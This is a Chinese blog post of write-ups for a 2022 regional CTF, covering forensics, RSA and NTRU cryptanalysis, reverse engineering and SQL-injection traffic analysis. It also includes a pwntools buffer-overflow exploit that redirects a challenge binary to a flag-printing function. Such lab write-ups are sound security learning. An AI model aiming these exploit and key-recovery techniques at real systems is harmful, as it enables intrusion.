2022某地区某行业ctf部分wp

作者: ylylhl | 来源:发表于2022-09-01 09:51 被阅读0次

又是一年，打了（打了），大家都好猛啊（……）

MISC

MISC-签到

丢stegsolve，调通道扫二维码得到前一半flag，lsb得到后一半flag，分别为Brainfuck和Ook!编码
https://www.splitbrain.org/services/ook

MISC-BitMap

丢进010进行一个模板的套，啪的一下，很明显啊，bfSize和bfOffBits都出来了

bfSize: 1080056 # 1080054不是4的倍数，需要在文件末尾补两个00
bfOffBits: 54 # 模板高亮部分显然16*3+6=54

且biBitCount为32，即

(width*height)*(32/8)+54+2=1080056 # (宽*高)*(字节/每像素)+文件头+补充的文件尾=文件大小

即width*height=270000。考虑到biHeight取值已给出提示（-300），则h=300, w=900。

根据恢复图像中的“blue green red and what”提示，提取各像素点中的rgbReserved位

import matplotlib.pyplot as plt
import numpy as np
with open('BitMap.bmp','rb') as f:
    data=f.read()
res=np.array([data[0x39+4*i]&1 for i in range(1080000//4)]).reshape(300,900)
plt.savefig("res.png")

新图像中的文字base32解码即为flag

IRAVGQ2UIZ5TAMBXMJSDIOJRHEYTKMRXG5STEMTEGIYDKZDFMU2DEOLGGQZDIYL5
# DASCTF{007bd491915277e22d205dee429f424a}

MISC-丢失的文件

首先来了个volatility一把梭

$ py -2 vol.py -f WIN-BU6IJ7FI9RU-20190927-163703.raw imageinfo
Volatility Foundation Volatility Framework 2.6.1
INFO    : volatility.debug    : Determining profile based on KDBG search...
 Suggested Profile(s) : Win7SP1x86_23418, Win7SP0x86, Win7SP1x86_24000, Win7SP1x86</pre>

然后进行一个文件的扫，很快啊，非常自信

$ py -2 vol.py -f WIN-BU6IJ7FI9RU-20190927-163703.raw --profile=Win7SP1x86_23418 filescan
Volatility Foundation Volatility Framework 2.6.1
……
0x000000003e4ca2f8      2      0 -W-rwd \Device\HarddiskVolume1\Users\CTF\Desktop\DumpIt\serect.zip-CTF\VMwareDnD\28cb21dd\serect.zip
……

secret，那我当然是dump出来瞅一眼

$ py -2 vol.py -f WIN-BU6IJ7FI9RU-20190927-163703.raw --profile=Win7SP1x86_23418 dumpfiles -Q 0x000000003e4ca2f8 -D .\

这压缩包要解压密码的，爆破+寻找解压密码无果，缓缓爬了（
……听了讲解，说要看剪贴板，这谁想得到啊！听我说谢谢你（怒）

$ py -2 vol.py -f WIN-BU6IJ7FI9RU-20190927-163703.raw --profile=Win7SP1x86_23418 clipboard

解压即得flag

MISC-USB流量分析

首先进行一个tshark的动作

tshark -r keyboard.pcap -T fields -e usb.capdata > usbdata1.txt

然后进行一个脚本的跑和整理（时隔四年的更新，我愿称之为keyboard超级无敌至尊豪华黄金DX版）

normalKeys = {
"04":"a", 
"05":"b", 
"06":"c", 
"07":"d", 
"08":"e", 
"09":"f", 
"0a":"g", 
"0b":"h", 
"0c":"i", 
"0d":"j", 
"0e":"k", 
"0f":"l", 
"10":"m", 
"11":"n", 
"12":"o", 
"13":"p", 
"14":"q", 
"15":"r", 
"16":"s", 
"17":"t", 
"18":"u", 
"19":"v", 
"1a":"w", 
"1b":"x", 
"1c":"y", 
"1d":"z",
"1e":"1", 
"1f":"2", 
"20":"3", 
"21":"4", 
"22":"5", 
"23":"6",
"24":"7",
"25":"8",
"26":"9",
"27":"0",
"28":"<RET>",
"29":"<ESC>",
"2a":"<DEL>", 
"2b":"\t",
"2c":"<SPACE>",
"2d":"-",
"2e":"=",
"2f":"[",
"30":"]",
"31":"\\",
"32":"<NON>",
"33":";",
"34":"'",
"35":"<GA>",
"36":",",
"37":".",
"38":"/",
"39":"<CAP>",
"3a":"<F1>",
"3b":"<F2>", 
"3c":"<F3>",
"3d":"<F4>",
"3e":"<F5>",
"3f":"<F6>",
"40":"<F7>",
"41":"<F8>",
"42":"<F9>",
"43":"<F10>",
"44":"<F11>",
"45":"<F12>",
"46":"<PrintScreen>",
"47":"<Scroll Lock>",
"48":"<Pause>",
"49":"<Insert>",
"4a":"<Home>",
"4b":"<PageUp>",
"4c":"<Delete Forward>",
"4d":"<End>",
"4e":"<PageDown>",
"4f":"<RightArrow>",
"50":"<LeftArrow>",
"51":"<DownArrow>",
"52":"<UpArrow>",
"53":"<Num Lock and Clear>",
"54":"/",
"55":"*",
"56":"-",
"57":"+",
"58":"<ENTER>",
"59":"1",
"5a":"2",
"5b":"3",
"5c":"4",
"5d":"5",
"5e":"6",
"5f":"7",
"60":"8",
"61":"9",
"62":"0",
"63":".",
"64":"\\",
"65":"<Application>",
"66":"<Power>",
"67":"=",
"68":"<F13>",
"69":"<F14>",
"6a":"<F15>",
"6b":"<F16>",
"6c":"<F17>",
"6d":"<F18>",
"6e":"<F19>",
"6f":"<F20>",
"70":"<F21>",
"71":"<F22>",
"72":"<F23>",
"73":"<F24>",
"74":"<Execute>",
"75":"<Help>",
"76":"<Menu>",
"77":"<Select>",
"78":"<Stop>",
"79":"<Again>",
"7a":"<Undo>",
"7b":"<Cut>",
"7c":"<Copy>",
"7d":"<Paste>",
"7e":"<Find>",
"7f":"<Mute>",
"80":"<Volume Up>",
"81":"<Volume Down>",
"82":"<Locking Caps Lock>",
"83":"<Locking Num Lock>",
"84":"<Locking Scroll Lock>",
"85":"<Comma>",
"86":"<Equal Sign>",
"87":"<International1>",
"88":"<International2>",
"89":"<International3>",
"8a":"<International4>",
"8b":"<International5>",
"8c":"<International6>",
"8d":"<International7>",
"8e":"<International8>",
"8f":"<International9>",
"90":"<LANG1>",
"91":"<LANG2>",
"92":"<LANG3>",
"93":"<LANG4>",
"94":"<LANG5>",
"95":"<LANG6>",
"96":"<LANG7>",
"97":"<LANG8>",
"98":"<LANG9>",
"99":"<Alternate Erase>",
"9a":"<SysReq/Attention>",
"9b":"<Cancel>",
"9c":"<Clear>",
"9d":"<Prior>",
"9e":"<Return>",
"9f":"<Separator>",
"a0":"<Out>",
"a1":"<Oper>",
"a2":"<Clear/Again>",
"a3":"<CrSel/Props>",
"a4":"<ExSel>",
"a5":"<Reserved>",
"a6":"<Reserved>",
"a7":"<Reserved>",
"a8":"<Reserved>",
"a9":"<Reserved>",
"aa":"<Reserved>",
"ab":"<Reserved>",
"ac":"<Reserved>",
"ad":"<Reserved>",
"ae":"<Reserved>",
"af":"<Reserved>",
"b0":"<00>",
"b1":"<000>",
"b2":"<Thousands Separator>",
"b3":"<Decimal Separator>",
"b4":"<Currency Unit>",
"b5":"<Currency Sub-unit>",
"b6":"(",
"b7":")",
"b8":"{",
"b9":"}",
"ba":"<Tab>",
"bb":"<Backspace>",
"bc":"A",
"bd":"B",
"be":"C",
"bf":"D",
"c0":"E",
"c1":"F",
"c2":"<XOR>",
"c3":"^",
"c4":"%",
"c5":"<",
"c6":">",
"c7":"&",
"c8":"&&",
"c9":"|",
"ca":"||",
"cb":":",
"cc":"#",
"cd":"<Space>",
"ce":"@",
"cf":"!",
"d0":"<Memory Store>",
"d1":"<Memory Recall>",
"d2":"<Memory Clear>",
"d3":"<Memory Add>",
"d4":"<Memory Subtract>",
"d5":"<Memory Multiply>",
"d6":"<Memory Divide>",
"d7":"<+/->",
"d8":"<Clear>",
"d9":"<Clear Entry>",
"da":"<Binary>",
"db":"<Octal>",
"dc":"<Decimal>",
"dd":"<Hexadecimal>",
"de":"<Reserved>",
"ef":"<Reserved>",
"e0":"<Left Control>",
"e1":"<Left Shift>",
"e2":"<Left Alt>",
"e3":"<Left GUI>",
"e4":"<Right Control>",
"e5":"<Right Shift>",
"e6":"<Right Alt>",
"e7":"<Right GUI>",
}
shiftKeys = {
"04":"A", 
"05":"B", 
"06":"C", 
"07":"D", 
"08":"E", 
"09":"F", 
"0a":"G", 
"0b":"H", 
"0c":"I", 
"0d":"J", 
"0e":"K", 
"0f":"L", 
"10":"M", 
"11":"N", 
"12":"O", 
"13":"P", 
"14":"Q", 
"15":"R", 
"16":"S", 
"17":"T", 
"18":"U", 
"19":"V", 
"1a":"W", 
"1b":"X", 
"1c":"Y", 
"1d":"Z",
"1e":"!", 
"1f":"@", 
"20":"#", 
"21":"$", 
"22":"%", 
"23":"^",
"24":"&",
"25":"*",
"26":"(",
"27":")",
"28":"<RET>",
"29":"<ESC>",
"2a":"<DEL>", 
"2b":"\t",
"2c":"<SPACE>",
"2d":"_",
"2e":"+",
"2f":"{",
"30":"}",
"31":"|",
"32":"<NON>",
"33":"\"",
"34":":",
"35":"<GA>",
"36":"<",
"37":">",
"38":"?",
"39":"<CAP>",
"3a":"<F1>",
"3b":"<F2>", 
"3c":"<F3>",
"3d":"<F4>",
"3e":"<F5>",
"3f":"<F6>",
"40":"<F7>",
"41":"<F8>",
"42":"<F9>",
"43":"<F10>",
"44":"<F11>",
"45":"<F12>",
"46":"<PrintScreen>",
"47":"<Scroll Lock>",
"48":"<Pause>",
"49":"<Insert>",
"4a":"<Home>",
"4b":"<PageUp>",
"4c":"<Delete Forward>",
"4d":"<End>",
"4e":"<PageDown>",
"4f":"<RightArrow>",
"50":"<LeftArrow>",
"51":"<DownArrow>",
"52":"<UpArrow>",
"53":"<Num Lock and Clear>",
"54":"/",
"55":"*",
"56":"-",
"57":"+",
"58":"<ENTER>",
"59":"1",
"5a":"2",
"5b":"3",
"5c":"4",
"5d":"5",
"5e":"6",
"5f":"7",
"60":"8",
"61":"9",
"62":"0",
"63":".",
"64":"\\",
"65":"<Application>",
"66":"<Power>",
"67":"=",
"68":"<F13>",
"69":"<F14>",
"6a":"<F15>",
"6b":"<F16>",
"6c":"<F17>",
"6d":"<F18>",
"6e":"<F19>",
"6f":"<F20>",
"70":"<F21>",
"71":"<F22>",
"72":"<F23>",
"73":"<F24>",
"74":"<Execute>",
"75":"<Help>",
"76":"<Menu>",
"77":"<Select>",
"78":"<Stop>",
"79":"<Again>",
"7a":"<Undo>",
"7b":"<Cut>",
"7c":"<Copy>",
"7d":"<Paste>",
"7e":"<Find>",
"7f":"<Mute>",
"80":"<Volume Up>",
"81":"<Volume Down>",
"82":"<Locking Caps Lock>",
"83":"<Locking Num Lock>",
"84":"<Locking Scroll Lock>",
"85":"<Comma>",
"86":"<Equal Sign>",
"87":"<International1>",
"88":"<International2>",
"89":"<International3>",
"8a":"<International4>",
"8b":"<International5>",
"8c":"<International6>",
"8d":"<International7>",
"8e":"<International8>",
"8f":"<International9>",
"90":"<LANG1>",
"91":"<LANG2>",
"92":"<LANG3>",
"93":"<LANG4>",
"94":"<LANG5>",
"95":"<LANG6>",
"96":"<LANG7>",
"97":"<LANG8>",
"98":"<LANG9>",
"99":"<Alternate Erase>",
"9a":"<SysReq/Attention>",
"9b":"<Cancel>",
"9c":"<Clear>",
"9d":"<Prior>",
"9e":"<Return>",
"9f":"<Separator>",
"a0":"<Out>",
"a1":"<Oper>",
"a2":"<Clear/Again>",
"a3":"<CrSel/Props>",
"a4":"<ExSel>",
"a5":"<Reserved>",
"a6":"<Reserved>",
"a7":"<Reserved>",
"a8":"<Reserved>",
"a9":"<Reserved>",
"aa":"<Reserved>",
"ab":"<Reserved>",
"ac":"<Reserved>",
"ad":"<Reserved>",
"ae":"<Reserved>",
"af":"<Reserved>",
"b0":"<00>",
"b1":"<000>",
"b2":"<Thousands Separator>",
"b3":"<Decimal Separator>",
"b4":"<Currency Unit>",
"b5":"<Currency Sub-unit>",
"b6":"(",
"b7":")",
"b8":"{",
"b9":"}",
"ba":"<Tab>",
"bb":"<Backspace>",
"bc":"A",
"bd":"B",
"be":"C",
"bf":"D",
"c0":"E",
"c1":"F",
"c2":"<XOR>",
"c3":"^",
"c4":"%",
"c5":"<",
"c6":">",
"c7":"&",
"c8":"&&",
"c9":"|",
"ca":"||",
"cb":":",
"cc":"#",
"cd":"<Space>",
"ce":"@",
"cf":"!",
"d0":"<Memory Store>",
"d1":"<Memory Recall>",
"d2":"<Memory Clear>",
"d3":"<Memory Add>",
"d4":"<Memory Subtract>",
"d5":"<Memory Multiply>",
"d6":"<Memory Divide>",
"d7":"<+/->",
"d8":"<Clear>",
"d9":"<Clear Entry>",
"da":"<Binary>",
"db":"<Octal>",
"dc":"<Decimal>",
"dd":"<Hexadecimal>",
"de":"<Reserved>",
"ef":"<Reserved>",
"e0":"<Left Control>",
"e1":"<Left Shift>",
"e2":"<Left Alt>",
"e3":"<Left GUI>",
"e4":"<Right Control>",
"e5":"<Right Shift>",
"e6":"<Right Alt>",
"e7":"<Right GUI>",
}
output = []
with open('usbdata1.txt','r') as keys:
    for line in keys:
        try:
            for i in range(0,len(line) + len(line)//2,3):
                line = line[:i+2] + ':' + line[i+2:]
            if line[0]!='0' or (line[1]!='0' and line[1]!='2') or line[3]!='0' or line[4]!='0' or line[9]!='0' or line[10]!='0' or line[12]!='0' or line[13]!='0' or line[15]!='0' or line[16]!='0' or line[18]!='0' or line[19]!='0' or line[21]!='0' or line[22]!='0' or line[6:8]=="00":
                continue
            if line[6:8] in normalKeys.keys():
                output += [[normalKeys[line[6:8]]],[shiftKeys[line[6:8]]]][line[1]=='2']
            else:
                output += ['[unknown]']
        except:
            pass

flag=0
print("".join(output))
for i in range(len(output)):
    try:
        a=output.index('<DEL>')
        del output[a]
        if a!=0:
            del output[a-1]
    except:
        pass
for i in range(len(output)):
    try:
        if output[i]=="<CAP>":
            flag+=1
            output.pop(i)
            if flag==2:
                flag=0
        if flag!=0:
            output[i]=output[i].upper()
    except:
        pass
print ('output :' + "".join(output).replace('<RET>','\n').replace('<SPACE>',' ')

md5加密得到flag

MISC-真快乐

妹想到三年前写的弱智脚本居然能重复利用（……）很慢，但也懒得写DL版，我爬我爬
仓库：利用kNN识别简单图片验证码

做了一点适配性修改

boxs =  [(0, 0, 50, 50),(50, 0, 100, 50), (100, 0, 150, 50), (150, 0, 200, 50)]

考虑到test文件夹图片开头结尾为FFD8和FFD9，识别结果写进jpg即得flag

a=bytes.fromhex(''.join(res))
with open('res.jpg','wb')as f:
    f.write(a)
# flag{2ce3232456e2c7ff11de771f9ca5aff7}

CRYPTO

CRYPTO-签到

丢cyberchef，base64解密然后替换字符慢慢试的（……）我爬我爬

# DASCTF{78ada113e709fdf12a5aa4aa5dd62e33}

CRYPTO-二次签到

密码师傅，不要再玩换表的base64了！！（

CRYPTO-RSA1

已知c1、d1、n，易得m1=pow(c1,d1,n)。
由n、e1、d1可得p、q，从而得到phi=(p-1)*(q-1)，又由d2=gmpy2.invert(e2,phi)，易得m2=pow(c2,d2,n)。

# from Crypto.Util.number import *
# import gmpy2

# msg1 = '**********************************'
# msg2 = '**********************************'
# hex_msg1=int(msg1.encode("hex"),16)
# hex_msg2=int(msg2.encode("hex"),16)

# p=getPrime(512)
# q=getPrime(512)
# n1=p*q
# e1=0x10001
# e2=getPrime(10)
# n2=n1
# c1=pow(hex_msg1,e1,n1)
# c2=pow(hex_msg2,e2,n2)

# phi=(p-1)*(q-1)
# d1=gmpy2.invert(e1,phi)
# print("d1=",hex(d1),"e1=",hex(e1),"n1=",hex(n1),"c1=",hex(c1))
# '''
# ('d1=', '0x7d12e57b1aa157038ebe5c45b56256270671e6984b0dcdf10a2ea07ce480143240c9a3e1c60870e499306a717073f157476aa88e99a7bdf1e2a4adf8ce21025cc6c05035c4a1d7e3b6f061464872e65118384999f0154f3c1761fa68d4685126b7fc98f4c2cdc41c98aa4e099a868a89099dd2170664647efca2c8d8e06a2e49',
# 'e1=', '0x10001',
# 'n1=', '0x96ed2727e4446e26c84552a9a19640c7d720c9b6e661cfcfec03463e92a9d0b228ddc9847c0daa137a19db67294626c535fe71c388f6ea3eb8cb5dbf09a84374eb021c9297a29394cf77da157c1b8be77b09a4fcbe54bf3dc93d33539e842766ad8e38369093ddc034ac32583a48e299a4d8b31b606b1729298ee136664b8b77L',
# 'c1=', '0x6c435db37217bc4da3f225a8f1a0501e03a97d2cbc4fa249df051ed66c1559b68885f4fa181bdd9e98242441f463dbbc1c26d1eea2c5774a0a905b366c8775bce8e52182dc32a93647c9b8842b74abc434e5b84eeae679a3b19cb7a1ef6ae8f65d22ce6ab438a16119805eee83408a68207bbdfde5181a8bd8b4794c711d33c4L')
# '''

# print("e2=",hex(e2),"n2=",hex(n2),"c2=",hex(c2))
# '''
# ('e2=', '0x3f1',
# 'n2=', '0x96ed2727e4446e26c84552a9a19640c7d720c9b6e661cfcfec03463e92a9d0b228ddc9847c0daa137a19db67294626c535fe71c388f6ea3eb8cb5dbf09a84374eb021c9297a29394cf77da157c1b8be77b09a4fcbe54bf3dc93d33539e842766ad8e38369093ddc034ac32583a48e299a4d8b31b606b1729298ee136664b8b77L', 
# 'c2=', '0x8cb5d8861e5838f41910d6eaf142a8d47b92e0c6b1b1e9e25896f7169644bbb726ccfdc82ba50932fbc45f00c53dda42f8efc358a5108cde8aaa9f38b493aa3417c9522924f06847ba4a3dd26f005a610f7633877fbe89e090df5cb3a7a5ebae0fbe72eabb339b21fa2ddd33844a5cb53e39491fc472721ed676ae07b33c8d6eL')
# '''
import gmpy2
import random
import libnum

def getPQ(n,e,d):
    k = e * d - 1
    r = k
    t = 0
    while True:
        r = r // 2
        t += 1
        if r % 2 == 1:
            break
    success = False
    for i in range(1, 101):
        g = random.randint(0, n)
        y = pow(g, r, n)
        if y == 1 or y == n - 1:
            continue
        for j in range(1, t):
            x = pow(y, 2, n)
            if x == 1:
                success = True
                break
            elif x == n - 1:
                continue
            else:
                y = x
        if success:
            break
        else:
            continue
    if success:
        p = libnum.gcd(y - 1, n)
        q = n // p
        return p,q
    else:
        print ('Cannot compute P and Q')
      
e1=0x10001
e2=0x3f1
d1=0x7d12e57b1aa157038ebe5c45b56256270671e6984b0dcdf10a2ea07ce480143240c9a3e1c60870e499306a717073f157476aa88e99a7bdf1e2a4adf8ce21025cc6c05035c4a1d7e3b6f061464872e65118384999f0154f3c1761fa68d4685126b7fc98f4c2cdc41c98aa4e099a868a89099dd2170664647efca2c8d8e06a2e49
n=0x96ed2727e4446e26c84552a9a19640c7d720c9b6e661cfcfec03463e92a9d0b228ddc9847c0daa137a19db67294626c535fe71c388f6ea3eb8cb5dbf09a84374eb021c9297a29394cf77da157c1b8be77b09a4fcbe54bf3dc93d33539e842766ad8e38369093ddc034ac32583a48e299a4d8b31b606b1729298ee136664b8b77
c1=0x6c435db37217bc4da3f225a8f1a0501e03a97d2cbc4fa249df051ed66c1559b68885f4fa181bdd9e98242441f463dbbc1c26d1eea2c5774a0a905b366c8775bce8e52182dc32a93647c9b8842b74abc434e5b84eeae679a3b19cb7a1ef6ae8f65d22ce6ab438a16119805eee83408a68207bbdfde5181a8bd8b4794c711d33c4
c2=0x8cb5d8861e5838f41910d6eaf142a8d47b92e0c6b1b1e9e25896f7169644bbb726ccfdc82ba50932fbc45f00c53dda42f8efc358a5108cde8aaa9f38b493aa3417c9522924f06847ba4a3dd26f005a610f7633877fbe89e090df5cb3a7a5ebae0fbe72eabb339b21fa2ddd33844a5cb53e39491fc472721ed676ae07b33c8d6e

p,q=getPQ(n,e1,d1)
print('m1:',libnum.n2s(pow(c1,d1,n)))
d2=int(gmpy2.invert(e2,(p-1)*(q-1)))
print('m2:',libnum.n2s(pow(c2,d2,n)))

# flag part one is :2295b774c4467c9a
# flag part two is :ca5c600783b9bde0

CRYPTO-RSA2

开局看到e3很大，进行一个wiener attack的动作

import gmpy2
from Crypto.PublicKey import RSA
import ContinuedFractions, Arithmetic
from Crypto.Util.number import long_to_bytes 

def wiener_hack(e, n):
    # firstly git clone https://github.com/pablocelayes/rsa-wiener-attack.git !
    frac = ContinuedFractions.rational_to_contfrac(e, n)
    convergents = ContinuedFractions.convergents_from_contfrac(frac)
    for (k, d) in convergents:
        if k != 0 and (e * d - 1) % k == 0:
            phi = (e * d - 1) // k
            s = n - phi + 1
            discr = s * s - 4 * n
            if (discr >= 0):
                t = Arithmetic.is_perfect_square(discr)
                if t != -1 and (s + t) % 2 == 0:
                    print("Hacked!")
                    return d,phi
    return False
def main():
    e=663164990242540553660820123984958362292767589050706562525585149518469420039430050814053460276242420171688628686731721858712475428243746423919061950258579075115696969767529903377571203001499079349600716341343846020128095111908915240158242174010840342112170003771807591457926458807775028482732501
    n=0x5bf7c98078ceec04b8c414c65731926712d48f6852c4d7a5dfeac5344d3f02d42dc8e387eb7e731c7efb233464279811228fb4bf96dbefe753c7b5a1850cbaa4d7f1048b5d3a2a7a0d3092fd8e4be0f8e298dfc57a38604c225760446816174be08ba1bcb7eaf594126961d5feab6de678a67e1100734d2edd76d6e3778c21e7
    c=0xcfd6983f1856b0fb6dc851d56ddcbfe66e03acb5ff568f6cd2c07f08448e09b5c513f76e939f4cf3d6f8b0950027c1a31ab6ae27d52ce0bb4b2c3d6502a8bd0e167471b1ee03e645b0aca8e2a93f4b1a8a9e3e493fc811e4104160a11494c548f21508559b508a6ef9a20df7e418fae6f33d14899419330ab29fed26712623b
    d,phi = wiener_hack(e, n)
    m = pow(c,d,n)
    print ('m:',m)
    print ('phi:',phi)
if __name__=="__main__":
    main()

已知phi、e1、e2、e3，易算出d1、d2、d3，进而通过pow(c,d,n)得到m。

# from Crypto.Util.number import *
# import binascii
# flag = '*****************************************'
# hex_flag=int(flag.encode("hex"),16)

# p=getPrime(512)
# q=getPrime(512)
# n=p*q

# e1=1376213
# e2=11932523 
# e3=663164990242540553660820123984958362292767589050706562525585149518469420039430050814053460276242420171688628686731721858712475428243746423919061950258579075115696969767529903377571203001499079349600716341343846020128095111908915240158242174010840342112170003771807591457926458807775028482732501

# c=pow(pow(pow(hex_flag,e1,n),e2,n),e3,n)
# print("n=",hex(n),"c=",hex(c))

# '''
# ('n=', '0x5bf7c98078ceec04b8c414c65731926712d48f6852c4d7a5dfeac5344d3f02d42dc8e387eb7e731c7efb233464279811228fb4bf96dbefe753c7b5a1850cbaa4d7f1048b5d3a2a7a0d3092fd8e4be0f8e298dfc57a38604c225760446816174be08ba1bcb7eaf594126961d5feab6de678a67e1100734d2edd76d6e3778c21e7L',
# 'c=', '0xcfd6983f1856b0fb6dc851d56ddcbfe66e03acb5ff568f6cd2c07f08448e09b5c513f76e939f4cf3d6f8b0950027c1a31ab6ae27d52ce0bb4b2c3d6502a8bd0e167471b1ee03e645b0aca8e2a93f4b1a8a9e3e493fc811e4104160a11494c548f21508559b508a6ef9a20df7e418fae6f33d14899419330ab29fed26712623bL')
# '''

import gmpy2
import libnum

e1=1376213
e2=11932523 
e3=663164990242540553660820123984958362292767589050706562525585149518469420039430050814053460276242420171688628686731721858712475428243746423919061950258579075115696969767529903377571203001499079349600716341343846020128095111908915240158242174010840342112170003771807591457926458807775028482732501

n=0x5bf7c98078ceec04b8c414c65731926712d48f6852c4d7a5dfeac5344d3f02d42dc8e387eb7e731c7efb233464279811228fb4bf96dbefe753c7b5a1850cbaa4d7f1048b5d3a2a7a0d3092fd8e4be0f8e298dfc57a38604c225760446816174be08ba1bcb7eaf594126961d5feab6de678a67e1100734d2edd76d6e3778c21e7
c=0xcfd6983f1856b0fb6dc851d56ddcbfe66e03acb5ff568f6cd2c07f08448e09b5c513f76e939f4cf3d6f8b0950027c1a31ab6ae27d52ce0bb4b2c3d6502a8bd0e167471b1ee03e645b0aca8e2a93f4b1a8a9e3e493fc811e4104160a11494c548f21508559b508a6ef9a20df7e418fae6f33d14899419330ab29fed26712623b
phi=64582068585400449854559773856215586254049871459934003885750881374390571949374960163831675283683435709342851751288865205417000272068038325969529608823713220090902209877602831251682355563845220513839652694871841465226375450915279218288554946739972407042319969761474571579122273434180473292075635457572207186384

d1=gmpy2.invert(e3,phi)
d2=gmpy2.invert(e2,phi)
d3=gmpy2.invert(e1,phi)
print(libnum.n2s(int(pow(pow(pow(c,d1,n),d2,n),d3,n))))
# flag is :78cc56ba4450a697fd625cc91ddf4432

CRYPTO-NTRU

题目：

from random import randrange
from Crypto.Util.number import *
from gmpy2 import invert
def gcd(a,b):
    while b:
        a,b = b,a%b
    return a

def generate():
    p = getPrime(1024)
    while True:
        f = randrange(1,(p//2)**(0.5))
        g = randrange((p//4)**(0.5),(p//2)**(0.5))
        if gcd(f,p)==1 and gcd(f,g)==1:
            break
    h = (invert(f,p)*g)%p
    return h,p,f,g

def encrypt(m,h,p):
    assert m<(p//4)**(0.5)
    r = randrange(1,(p//2)**(0.5))
    c = (r*h+m)%p
    return c

h,p,f,g = generate()

from flag import flag
c = encrypt(bytes_to_long(flag),h,p)
print("h = {}".format(h))
print("p = {}".format(p))
print("c = {}".format(c))

抄了（抄了），参考：

# sage (https://sagecell.sagemath.org/)
h = 70851272226599856513658616506718804769182611213413854493145253337330709939355936692154199813179587933065165812259913249917314725765898812249062834111179900151466610356207921771928832591335738750053453046857602342378475278876652263044722419918958361163645152112020971804267503129035439011008349349624213734004
p = 125796773654949906956757901514929172896506715196511121353157781851652093811702246079116208920427110231653664239838444378725001877052652056537732732266407477191221775698956008368755461680533430353707546171814962217736494341129233572423073286387554056407408816555382448824610216634458550949715062229816683685469
c = 4691517945653877981376957637565364382959972087952249273292897076221178958350355396910942555879426136128610896883898318646711419768716904972164508407035668258209226498292327845169861395205212789741065517685193351416871631112431257858097798333893494180621728198734264288028849543413123321402664789239712408700

# Construct lattice.
v1 = vector(ZZ, [1, h])
v2 = vector(ZZ, [0, p])
m = matrix([v1,v2]);

# Solve SVP.
shortest_vector = m.LLL()[0]
f, g = shortest_vector
if f < 0 and g < 0:
    g *= -1
    f *= -1
print(f, g)
    
# Decrypt.
a = f*c % p % g
m = a * inverse_mod(f, g) % g
print(bytes.fromhex(hex(m)[2:]))

# flag{93d02e3bf2c7458a47aac58387140dd5}

RE-cathex

拖IDA，f5可得：

RE-easyrere

又进行了一个F5的一把梭

RE-逻辑清晰

又又进行了一个F5的动作，为何RE题如此简单，我恨自己没有先抢RE一血……
人不应该把有限的生命投入到无限的rsa中（

v13=[1]*32
v13[0] = 77
v13[1] = 127
v13[2] = 112
v13[3] = 70
v13[4] = 74
v13[5] = 33
v13[6] = 44
v13[7] = 23
v13[8] = 73
v13[9] = 34
v13[10] = 45
v13[11] = 72
v13[12] = 19
v13[13] = 39
v13[14] = 112
v13[15] = 70
v13[16] = 19
v13[17] = 115
v13[18] = 36
v13[19] = 70
v13[20] = 17
v13[21] = 36
v13[22] = 116
v13[23] = 17
v13[24] = 69
v13[25] = 127
v13[26] = 120
v13[27] = 23
v13[28] = 30
v13[29] = 113
v13[30] = 46
v13[31] = 18

v9 = 122
v12=['']*32
# for i in range(0,32):
#   for j in range(0,i):
#       v9 ^= v12[j]
#   v9 ^ v12[i] == v13[i]

for i in range(0,32):
    for j in range(0,i):
        v9 ^= v12[j]
    v12[i]=v13[i]^v9
print(''.join([chr(i)for i in v12]))

PWN

PWN-magicc

赛后复盘desu。
依旧IDA大法，找到关键函数

ssize_t Slytherin()
{
  char buf[18]; // [esp+16h] [ebp-12h] BYREF

  puts("Here you can learn Avada Kedavra");
  puts("You are one step short of success");
  return read(0, buf, 0x28u);
}

int hgdjskhrtdiu()
{
  return system("cat flag");
}

且buf到r的距离是0x12+0x4

位于+00000000处的s是存上一个ebp的值，用于恢复上一个函数，位于+00000004处的r是这个函数的返回地址。只需要覆盖返回地址r，使它变成我们想要的函数地址，就可以劫持程序，让程序执行完Slytherin就执行我们想要的函数。

from pwn import *
p = process('./magicc')
elf = ELF("./magicc")
f_addr = elf.symbols["hgdjskhrtdiu"]
p.recvuntil('Slytherin\n')
p.sendline(b'4')
p.recvuntil('success\n')
p.sendline(b'a'*(0x12+0x4)+p32(f_addr))
p.interactive()

PY

亲友不知从哪儿摸来的题，浅打一下

MISC-injection

盲注的流量，管道筛一下再正则筛一下，完事儿

tshark -r injection.pcap | grep "whoami" > injec.txt

import re
from itertools import groupby
with open('injec.txt',encoding='utf-8') as f:
    data=f.read()
a=re.findall(r"whoami\),(.*?),1\)\)=ascii\('(.*?)'\),SLEEP",data)
flag="".join([list(g)[-1][-1] for k,g in groupby(a,key=lambda x:x[0])])
print(flag.replace("%7B","{").replace("%7D","}"))

RE-冰冰给我flag可以吗

先拿pyinstxtractor反编译exe

python pyinstxtractor.py pypy.exe

再拿uncompyle6反编译pyc，结束
*也许因为py版本不一样……需要拿struct.pyc的magic head替换掉pypy.pyc的magic head才能反编译，简单来说就是替换掉E3这个值之前的部分

uncompyle6 -o pypy.py pypy.pyc

##import base58
##
##def enc(stream, file):
##    text = base58.b58encode(stream)
##    temp = list(bytes.decode(text))
##    return temp
##
##if __name__ == '__main__':
##    fp = open('冰冰给我flag可以吗.png', 'rb')
##    context = fp.read()
##    key = context[0]
##    fp.close()
##    fp = open('冰冰给我flag可以吗.png', 'wb')
##    tmp = enc(context, fp)
##    for i in range(len(tmp)):
##        tmp[i] = chr(ord(tmp[i]) ^ key)
##    
##    fp.write(bytes(''.join(tmp), 'utf-8', **('encoding',)))
##    fp.close()

import base58
with open('1.png','rb')as f:
    data=f.read()
a = "".join([chr(ord(i) ^ 137) for i in bytes.decode(data,'utf-8')])
a = base58.b58decode(a)

with open('2.png','wb')as f:
    f.write(a)

so deep

7zip打开vhd文件解压，得到wav文件和一个压缩包

结合题目名，推测考点为使用deepsound的wav隐写。下载软件，打开wav文件，可得chall.zip的解压密码passwd.txt，解压得到flag.zip和level2.mrf。
必应搜索（……）可得该文件为marco recorder文件（官网打不开，乐），下载安装该软件，结合bandizip加密压缩界面（需确认压缩密码，故重复输入两次）得到flag.zip解压密码，解压即得flag。

WDC

CRYPTO-sample math

from Crypto.Util.number import getPrime
import hashlib

e = 2022

m = getPrime(512)
m1 = getPrime(512)
m2 = getPrime(512)
flag = m + m1 + m2
flag = hashlib.md5(str(flag).encode('utf-8')).hexdigest()

c1 = pow(m+m1,e,m*m1)
c2 = pow(m+m2,e,m*m2)
c3 = pow(m1+m2,e,m1*m2)

x = pow(m1+2022,m,m*m1)
y = pow(m2+2022,m,m*m2)
z = pow(m+2022,m1,m*m1)

print('c1 =',c1)
